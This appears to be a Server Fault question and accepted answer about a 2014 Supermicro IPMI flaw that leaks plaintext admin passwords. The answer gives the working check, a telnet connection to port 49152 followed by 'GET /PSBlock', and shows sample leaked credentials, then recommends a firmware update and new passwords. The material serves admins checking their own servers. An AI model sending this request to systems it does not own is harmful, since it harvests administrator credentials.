Home / server / Questions / 606877
Accepted
Vinícius Ferrão
Asked: 2014-06-21 12:29:16 +0800 CST

How to check if my Supermicro IPMI is compromised with plaintext admin password over the web?

  • 772

I've some Supermicro servers with IPMI running, and as described in this blog (http://blog.cari.net/carisirt-yet-another-bmc-vulnerability-and-some-added-extras) there's a critical vulnerability to get plaintext admin passwords from any remote location.

How to check if my server motherboard is compromised?

password

1 Answers

  1. Best Answer

    Simply telnet to the IPMI IP Address in port 49152 and do a specific GET request. You should get your users and passwords if you're compromised.

    telnet server.example.com 49152

    After the connection ask for GET /PSBlock and watch the results, it should be something like this:

    Trying 192.168.1.22...
Connected to server.example.com.
Escape character is '^]'.
GET /PSBlock

    Answer:

    =%}?
0adminADMIN**yourPlaintextPasswordHere**;TTroot**AnotherPassword**???%?v?i?o???DDD@??

    To solve this issue update the IPMI firmware to the latest version. The firmware is specific to your IPMI controller, so you should get the specified in Supermicro website.

    Then after updating the firmware change your passwords.

    • 13